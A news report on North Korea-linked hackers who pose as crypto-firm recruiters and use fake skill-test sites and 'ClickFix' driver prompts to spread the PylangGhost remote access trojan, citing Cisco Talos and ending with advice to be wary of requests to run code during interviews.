North Korean hackers, identified as “Famous Chollima” (also known as “Wagemole”), has been leveraging elaborate fake job interviews to distribute advanced spyware and steal data from professionals in the cryptocurrency and blockchain industries. This campaign is part of a wider cyber offensive attributed to the notorious Lazarus Group, which has reportedly laundered billions of dollars in stolen cryptocurrency over the past year.
Threat intelligence research firm Cisco Talos revealed on Wednesday that Famous Chollima is deploying a new Python-based remote access trojan (RAT) dubbed “PylangGhost” in these attacks. The malware is functionally similar to the previously documented “GolangGhost” RAT, indicating a continued evolution of the group’s toolset.
Impersonating recruiters from Coinbase, Robinhood, Archblock, Parallel Studios, Uniswap
“Based on the advertised positions, it is clear that the Famous Chollima is broadly targeting individuals with previous experience in cryptocurrency and blockchain technologies,” a spokesperson for Cisco Talos stated in their recent blog post.
The modus operandi involves impersonating recruiters from prominent crypto companies such as Coinbase, Robinhood, Archblock, Parallel Studios, and Uniswap. Job applicants are lured to meticulously crafted, fake skill-testing websites, often built using the React framework. After completing a series of questions and providing personal details, victims are prompted to record a video for a supposed interview. When camera access is requested, the sites display deceptive error messages, instructing users to copy and paste malicious code onto their devices to “install necessary video drivers.”
‘ClickFix’ tactic
This “ClickFix” tactic exploits human problem-solving tendencies, leading victims to inadvertently execute commands that download the PylangGhost malware. Cisco Talos confirmed that separate versions of the malware exist for both Windows and macOS systems, enabling the hackers to steal stored browser credentials, session cookies, and other sensitive data from various browser extensions, including those associated with crypto wallets like Metamask, 1Password, and Phantom.
While the primary focus of this campaign appears to be data exfiltration, the broader activities of Famous Chollima and the Lazarus Group are known to have significant financial motivations. US law enforcement agencies have previously stated that North Korea’s military generates billions of dollars through such illicit schemes, including direct cryptocurrency thefts and the funneling of salaries from North Korean IT workers infiltrated into legitimate companies.
PylangGhost campaign
Officials from cybersecurity firms like CrowdStrike have previously reported on the “Wagemole” tactic, where North Korean actors use forged identities and AI-generated LinkedIn profiles to secure remote employment at Western tech firms. The intention is often dual-purpose: to generate revenue for the regime through salaries and to gain access that can be exploited for further espionage or direct cyberattacks.
While Cisco Talos has noted that most known victims in this specific PylangGhost campaign are located in India, and the overall impact remains limited based on open-source intelligence, the ongoing nature and sophistication of these attacks highlight a persistent threat to the global cryptocurrency ecosystem. Cybersecurity experts continue to urge vigilance, advising individuals and companies to thoroughly vet all job opportunities and to be highly suspicious of any requests to execute code or download software during an interview process.
